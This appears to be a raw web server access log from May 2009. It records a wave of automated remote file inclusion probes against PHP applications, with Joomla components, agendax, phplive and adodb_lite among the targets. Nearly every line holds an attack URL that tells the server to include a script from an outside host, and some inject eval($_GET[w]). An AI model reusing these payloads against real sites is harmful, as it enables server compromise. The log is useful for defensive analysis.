210.188.218.41 - - [28/May/2009:10:13:06 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:14:57 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:14:57 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.165.73.157 - - [28/May/2009:10:15:00 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
121.165.73.157 - - [28/May/2009:10:15:01 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
121.165.73.157 - - [28/May/2009:10:15:04 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
121.165.73.157 - - [28/May/2009:10:15:05 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
66.219.99.129 - - [28/May/2009:10:16:07 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:16:07 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:16:10 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:16:10 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
123.143.98.5 - - [28/May/2009:10:17:26 -0500] "GET //shop/main.php?_shop_path=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:10:17:26 -0500] "GET /logs/access_log.1230681600//shop/main.php?_shop_path=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:10:17:26 -0500] "GET /logs//shop/main.php?_shop_path=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
123.143.98.5 - - [28/May/2009:10:17:26 -0500] "GET /logs/access_log.1230422400//shop/main.php?_shop_path=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:10:18:58 -0500] "GET /logs/access_log.1239753600//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:10:18:58 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:10:19:01 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
213.206.93.3 - - [28/May/2009:10:20:19 -0500] "GET /logs/index.php?option=com_jpack&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
213.206.93.3 - - [28/May/2009:10:20:20 -0500] "GET /index.php?option=com_jpack&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
212.97.132.101 - - [28/May/2009:10:23:26 -0500] "GET /logs//poll/admin/common.inc.php?base_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
212.97.132.101 - - [28/May/2009:10:23:26 -0500] "GET //poll/admin/common.inc.php?base_path=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 297 "-""libwww-perl/5.53"
65.55.106.204 - - [28/May/2009:10:24:11 -0500] "GET /logs/access_log.1145318400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.188.218.41 - - [28/May/2009:10:25:37 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:25:38 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:25:49 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:25:50 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:26:26 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:26:26 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:26:43 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:26:44 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:26:44 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:26:45 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:26:46 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:26:46 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:26:57 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:26:57 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:27:50 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:27:50 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
202.75.4.169 - - [28/May/2009:10:27:56 -0500] "GET /logs/index.php?option=com_jpack&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [28/May/2009:10:27:56 -0500] "GET /index.php?option=com_jpack&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:28:55 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:28:55 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:29:14 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:29:14 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
216.119.103.12 - - [28/May/2009:10:29:17 -0500] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 346 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:10:29:17 -0500] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:10:29:17 -0500] "GET /logs/access_log.1242000000//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 368 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:10:29:18 -0500] "GET /logs/access_log.1242172800//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 368 "-""Mozilla/5.0"
66.219.99.129 - - [28/May/2009:10:29:21 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:29:21 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:29:51 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:29:52 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:29:54 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:29:55 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
216.119.103.12 - - [28/May/2009:10:31:09 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 349 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:10:31:09 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:10:31:09 -0500] "GET /logs/access_log.1239321600//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 376 "-""Mozilla/5.0"
66.219.99.129 - - [28/May/2009:10:31:11 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:31:11 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:31:12 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:10:31:13 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:31:30 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:10:31:31 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
67.212.165.114 - - [28/May/2009:10:31:49 -0500] "GET /logs////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.825"
67.212.165.114 - - [28/May/2009:10:31:49 -0500] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.825"
87.106.67.146 - - [28/May/2009:10:31:52 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.106.67.146 - - [28/May/2009:10:31:52 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
62.146.68.61 - - [28/May/2009:10:32:04 -0500] "GET /logs//phplive/help.php?css_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:10:32:04 -0500] "GET /logs/access_log.1238976000//phplive/help.php?css_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:10:32:04 -0500] "GET //phplive/help.php?css_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:10:32:04 -0500] "GET /logs/access_log.1236643200//phplive/help.php?css_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.56.55.217 - - [28/May/2009:10:32:23 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://208.98.22.241/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
195.56.55.217 - - [28/May/2009:10:32:23 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
61.6.163.37 - - [28/May/2009:10:32:25 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 286 "-""Mozilla/5.0"
61.6.163.37 - - [28/May/2009:10:32:25 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 281 "-""Mozilla/5.0"
61.6.163.37 - - [28/May/2009:10:32:25 -0500] "GET /logs/access_log.1239753600//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 308 "-""Mozilla/5.0"
87.106.67.146 - - [28/May/2009:10:32:31 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.106.67.146 - - [28/May/2009:10:32:32 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
61.6.163.37 - - [28/May/2009:10:33:01 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 308 "-""Mozilla/5.0"
209.200.27.114 - - [28/May/2009:10:33:07 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
209.200.27.114 - - [28/May/2009:10:33:07 -0500] "GET /htmltonuke.php?filnavn=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
88.191.103.144 - - [28/May/2009:10:33:45 -0500] "GET /logs/access_log.1242086400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.103.144 - - [28/May/2009:10:33:45 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.103.144 - - [28/May/2009:10:33:45 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:10:34:10 -0500] "GET /logs/access_log.1236470400//phplive/help.php?css_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
75.145.152.113 - - [28/May/2009:10:34:31 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mykr.net/bbs/data/id/copyright.txt????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
75.145.152.113 - - [28/May/2009:10:34:31 -0500] "GET /logs/access_log.1237161600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mykr.net/bbs/data/id/copyright.txt????? HTTP/1.1" 404 364 "-""Mozilla/5.0"
75.145.152.113 - - [28/May/2009:10:34:32 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mykr.net/bbs/data/id/copyright.txt????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
75.145.152.113 - - [28/May/2009:10:34:36 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mykr.net/bbs/data/id/copyright.txt????? HTTP/1.1" 404 364 "-""Mozilla/5.0"
88.191.103.144 - - [28/May/2009:10:34:46 -0500] "GET /logs/access_log.1241654400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.103.144 - - [28/May/2009:10:35:02 -0500] "GET /logs/access_log.1240358400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
61.6.163.37 - - [28/May/2009:10:35:16 -0500] "GET /logs/access_log.1229904000//include/admin.lib.inc.php?site_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 324 "-""Mozilla/5.0"
61.6.163.37 - - [28/May/2009:10:35:16 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 302 "-""Mozilla/5.0"
61.6.163.37 - - [28/May/2009:10:35:17 -0500] "GET //include/admin.lib.inc.php?site_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 297 "-""Mozilla/5.0"
121.165.73.157 - - [28/May/2009:10:35:59 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
121.165.73.157 - - [28/May/2009:10:35:59 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
121.165.73.157 - - [28/May/2009:10:36:00 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
121.165.73.157 - - [28/May/2009:10:36:00 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
216.119.103.12 - - [28/May/2009:10:36:13 -0500] "GET /logs/access_log.1242000000//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 376 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:10:36:51 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:10:36:51 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:10:36:51 -0500] "GET /logs/access_log.1239926400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.172.225.50 - - [28/May/2009:10:37:10 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
211.172.225.50 - - [28/May/2009:10:37:10 -0500] "GET /htmltonuke.php?filnavn=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
209.200.27.114 - - [28/May/2009:10:38:26 -0500] "GET /logs/errors.php?error=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.200.27.114 - - [28/May/2009:10:38:27 -0500] "GET /errors.php?error=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:38:33 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:10:38:33 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
219.85.63.226 - - [28/May/2009:10:39:04 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
219.85.63.226 - - [28/May/2009:10:39:04 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
209.25.170.73 - - [28/May/2009:10:39:09 -0500] "GET /logs/errors.php?error=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
209.25.170.73 - - [28/May/2009:10:39:09 -0500] "GET /errors.php?error=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
65.55.106.170 - - [28/May/2009:10:39:42 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.172.225.50 - - [28/May/2009:10:40:00 -0500] "GET /logs/errors.php?error=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
211.172.225.50 - - [28/May/2009:10:40:01 -0500] "GET /errors.php?error=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
201.232.54.48 - - [28/May/2009:10:40:17 -0500] "GET /logs/access_log.1240876800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:40:17 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:40:17 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:40:46 -0500] "GET /logs/access_log.1240272000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:41:23 -0500] "GET /logs/access_log.1240876800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:41:23 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:41:23 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:41:43 -0500] "GET /logs/access_log.1240272000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:41:54 -0500] "GET /logs/access_log.1237161600//?_SERVER%5BDOCUMENT_ROOT%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:41:54 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:41:54 -0500] "GET /logs/access_log.1230768000//?_SERVER%5BDOCUMENT_ROOT%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:42:02 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 191100 "-""Mozilla/5.0"
65.55.106.206 - - [28/May/2009:10:43:07 -0500] "GET /logs/access_log.1181174400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.232.54.48 - - [28/May/2009:10:43:16 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:43:16 -0500] "GET /logs/access_log.1237161600//?_SERVER%5BDOCUMENT_ROOT%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:10:43:17 -0500] "GET /logs/access_log.1230768000//?_SERVER%5BDOCUMENT_ROOT%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:10:43:19 -0500] "GET /logs/access_log.1241481600//administrator/components/com_virtuemart/notify.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:10:43:19 -0500] "GET /logs//administrator/components/com_virtuemart/notify.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
